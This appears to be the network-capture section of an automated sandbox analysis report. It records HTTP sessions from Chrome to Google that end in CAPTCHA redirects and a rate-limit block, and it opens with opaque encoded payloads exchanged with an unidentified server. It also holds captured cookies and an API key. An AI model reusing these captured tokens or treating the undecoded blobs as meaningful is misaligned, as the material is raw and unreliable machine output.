                                                                                                                                                      Data Raw: 2f 65 5a 42 73 2b 42 6c 51 46 58 71 30 59 64 4b 4f 31 72 57 47 6b 67 6a 65 44 4b 4a 4a 32 7a 4e 41 34 53 38 48 69 44 55 4c 56 41 74 69 53 56 57 6f 48 52 30 44 67 2b 47 4d 38 61 53 79 38 54 4c 32 6f 73 72 64 32 2b 64 57 65 6e 6f 6b 77 76 6c 48 62 51 33 71 38 65 56 30 51 78 2b 73 52 56 72 77 49 75 4f 64 70 78 62 43 51 36 2f 67 70 64 72 64 50 63 30 64 50 70 32 79 46 69 54 74 58 70 58 4c 46 63 32 30 4d 4d 50 74 37 33 36 44 48 48 6e 46 55 74 42 38 52 42 79 4a 6e 55 70 30 75 32 2f 56 64 71 67 4c 49 43 66 4c 4c 31 72 4a 4a 41 6a 46 6d 5a 71 67 55 65 69 35 45 5a 7a 68 66 6e 45 69 52 35 64 71 66 51 33 5a 30 59 4c 6e 46 74 56 4f 57 77 4d 46 67 34 6c 76 77 70 4d 69 4e 72 74 4f 78 35 4c 64 2b 59 76 4f 6c 55 4b 53 71 32 41 37 74 43 6d 4a 33 39 4e 2f 6c 79 79 4b 37 2f 69 64 52 59 51 34 39 4f 47 6a 79 4b 6d 52 4c 7a 41 44 56 4c 78 6f 33 6a 6e 46 4e 69 4c 45 6e 38 30 52 57 59 33 42 73 30 4c 43 33 30 3d
                                                                                                                                                      Data Ascii: /eZBs+BlQFXq0YdKO1rWGkgjeDKJJ2zNA4S8HiDULVAtiSVWoHR0Dg+GM8aSy8TL2osrd2+dWenokwvlHbQ3q8eV0Qx+sRVrwIuOdpxbCQ6/gpdrdPc0dPp2yFiTtXpXLFc20MMPt736DHHnFUtB8RByJnUp0u2/VdqgLICfLL1rJJAjFmZqgUei5EZzhfnEiR5dqfQ3Z0YLnFtVOWwMFg4lvwpMiNrtOx5Ld+YvOlUKSq2A7tCmJ39N/lyyK7/idRYQ49OGjyKmRLzADVLxo3jnFNiLEn80RWY3Bs0LC30=
                                                                                                                                                      Apr 27, 2024 02:21:10.196558952 CEST405INHTTP/1.1 200 OK
                                                                                                                                                      cache-control: private
                                                                                                                                                      content-length: 192
                                                                                                                                                      content-type: text/html; charset=utf-8
                                                                                                                                                      x-whom: Ioloweb5
                                                                                                                                                      date: Sat, 27 Apr 2024 00:21:09 GMT
                                                                                                                                                      set-cookie: SERVERID=svc5; path=/
                                                                                                                                                      connection: close
                                                                                                                                                      Data Raw: 39 76 37 59 43 62 54 6a 68 53 4f 54 65 7a 71 52 74 42 41 38 44 61 46 35 46 43 52 49 72 4c 62 32 49 6c 78 6c 34 38 6a 4b 61 69 32 6d 65 6d 45 6e 73 33 69 48 76 54 35 4c 2b 48 33 43 49 6c 49 68 4f 6f 33 44 5a 35 33 6d 6c 6a 61 38 4b 42 32 59 45 49 73 2f 6a 31 50 54 39 36 78 49 73 73 61 66 69 37 62 44 69 4d 64 6b 2f 49 41 58 37 55 4a 75 55 59 31 35 61 38 31 67 4d 75 75 46 5a 4c 41 54 67 2b 42 39 62 35 69 4b 57 33 77 6f 49 4f 50 6c 6f 49 59 4a 45 65 78 30 33 62 6f 4c 51 68 4f 49 70 2b 4f 45 77 34 6a 52 4c 48 75 52 75 35 62 44 2b 34 61 49 49 42 63 42 43 43 69 6d 2b 6b 4e 53
                                                                                                                                                      Data Ascii: 9v7YCbTjhSOTezqRtBA8DaF5FCRIrLb2Ilxl48jKai2memEns3iHvT5L+H3CIlIhOo3DZ53mlja8KB2YEIs/j1PT96xIssafi7bDiMdk/IAX7UJuUY15a81gMuuFZLATg+B9b5iKW3woIOPloIYJEex03boLQhOIp+OEw4jRLHuRu5bD+4aIIBcBCCim+kNS


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      0192.168.2.449751142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:16 UTC607OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                      2024-04-27 00:20:16 UTC1703INHTTP/1.1 200 OK
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:16 GMT
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: -1
                                                                                                                                                      Cache-Control: no-cache, must-revalidate
                                                                                                                                                      Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-KcmahvSQI2xx3xEmKmiCbQ' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                      Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                      Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                      Accept-CH: Sec-CH-UA-Model
                                                                                                                                                      Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                      Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                      Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                      Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                      Server: gws
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Connection: close
                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                      2024-04-27 00:20:16 UTC799INData Raw: 33 31 38 0d 0a 29 5d 7d 27 0a 5b 22 22 2c 5b 22 6e 66 6c 20 64 72 61 66 74 20 62 79 72 6f 6e 20 6d 75 72 70 68 79 22 2c 22 66 63 63 20 69 6e 74 65 72 6e 65 74 22 2c 22 6c 65 67 6f 20 6d 69 6c 6b 79 20 77 61 79 20 67 61 6c 61 78 79 22 2c 22 6b 61 6e 73 61 73 20 63 69 74 79 20 74 6f 72 6e 61 64 6f 65 73 22 2c 22 77 6f 72 64 6c 65 20 74 6f 64 61 79 20 61 6e 73 77 65 72 20 61 70 72 69 6c 20 32 36 22 2c 22 73 68 61 6d 72 6f 63 6b 20 67 6f 6c 64 65 6e 20 72 65 74 72 69 65 76 65 72 20 70 75 70 70 79 22 2c 22 77 68 61 74 20 64 72 61 66 74 20 70 69 63 6b 73 20 64 6f 20 65 61 67 6c 65 73 20 68 61 76 65 20 69 6e 20 32 30 32 34 22 2c 22 6c 61 74 69 6e 20 61 6d 65 72 69 63 61 6e 20 6d 75 73 69 63 20 61 77 61 72 64 73 20 77 69 6e 6e 65 72 73 22 5d 2c 5b 22 22 2c 22 22
                                                                                                                                                      Data Ascii: 318)]}'["",["nfl draft byron murphy","fcc internet","lego milky way galaxy","kansas city tornadoes","wordle today answer april 26","shamrock golden retriever puppy","what draft picks do eagles have in 2024","latin american music awards winners"],["",""
                                                                                                                                                      2024-04-27 00:20:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                      Data Ascii: 0


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      1192.168.2.449752142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:16 UTC353OUTGET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      2192.168.2.449749142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:16 UTC510OUTGET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                      2024-04-27 00:20:16 UTC1843INHTTP/1.1 302 Found
                                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                      x-hallmonitor-challenge: CgwIwImxsQYQrJCikwMSBJoQwLk
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:16 GMT
                                                                                                                                                      Server: gws
                                                                                                                                                      Content-Length: 458
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-27-00; expires=Mon, 27-May-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                      Set-Cookie: NID=513=c4eeLLbbUjrdVmY_3J67bVqlRrcId_Uly38Ob6hofqA06jqIxHd5LWwDDb_r2n_PI-Nq7d4rl0LqmARVgn0EQZL3iurYGIl8JRK4ijq2lCBIDoh_Xo7ipkby0KBmt1nHFR-uf5Pr1tzPsHyswZ_A9PXlsQ1zkKv12A3Y2VM9JHs; expires=Sun, 27-Oct-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-04-27 00:20:16 UTC458INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      3192.168.2.449750142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:16 UTC353OUTGET /async/newtab_promos HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                      2024-04-27 00:20:16 UTC1761INHTTP/1.1 302 Found
                                                                                                                                                      Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                                                                      x-hallmonitor-challenge: CgwIwImxsQYQ_avLhAMSBJoQwLk
                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                      Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                      Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                      Permissions-Policy: unload=()
                                                                                                                                                      Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                                                                      Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                                                                      P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:16 GMT
                                                                                                                                                      Server: gws
                                                                                                                                                      Content-Length: 417
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                      Set-Cookie: 1P_JAR=2024-04-27-00; expires=Mon, 27-May-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                                                                      Set-Cookie: NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4; expires=Sun, 27-Oct-2024 00:20:16 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-04-27 00:20:16 UTC417INData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      4192.168.2.449754142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:17 UTC738OUTGET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgSaEMC5GMCJsbEGIjDQUM1XksqiVK7TvDJ-VWO8_5g4InGTtoS9EM--2kh8-SXh1FoYbI9aSPEi5GAatgQyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                      Cookie: 1P_JAR=2024-04-27-00; NID=513=nlJq8NksY3fw5JjqePju25SB4Ei052Ou-_BYpqCCmn5cqs1f7XdItZC5M5e-NHwxW8MHKmNIQq2CnKFtMN_ebrB1BwDEg6kASn0UsYT9aGECdJ6CQ0wzQfDYJstMC0Kt6w1U5xw-pQAMPux27C__0M0wEogYWQpCfaKnIaXXWG4
                                                                                                                                                      2024-04-27 00:20:17 UTC356INHTTP/1.1 429 Too Many Requests
                                                                                                                                                      Date: Sat, 27 Apr 2024 00:20:17 GMT
                                                                                                                                                      Pragma: no-cache
                                                                                                                                                      Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                      Content-Type: text/html
                                                                                                                                                      Server: HTTP server (unknown)
                                                                                                                                                      Content-Length: 3113
                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                      Connection: close
                                                                                                                                                      2024-04-27 00:20:17 UTC899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64
                                                                                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
                                                                                                                                                      2024-04-27 00:20:17 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 42 44 79 70 46 6b 74 59 62 6b 47 53 59 72 37 61 31 79 49 4c 53 73 45 71 42 6a 34 4f 4a 4a 42 63 77
                                                                                                                                                      Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="BDypFktYbkGSYr7a1yILSsEqBj4OJJBcw
                                                                                                                                                      2024-04-27 00:20:17 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                                                                                                      Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                      5192.168.2.449755142.251.32.1004435268C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-04-27 00:20:17 UTC912OUTGET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgSaEMC5GMCJsbEGIjAHBiCBZ-8IAykP8bXpVLKe0gHlM-R2QwNJoGYdPTBn5xWSyLCRRyfLdQ2qWbDO2CMyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                                                                      Host: www.google.com
                                                                                                                                                      Connection: keep-alive
                                                                                                                                                      X-Client-Data: CKq1yQEIi7bJAQiktskBCKmdygEIoOHKAQiTocsBCJz+zAEIhaDNAQjcvc0BCLnKzQEIotHNAQiK080BCJ7WzQEIp9jNAQj5wNQVGPbJzQEYutLNARjrjaUX
                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                      Accept-Language: en-US,en;q=0.9
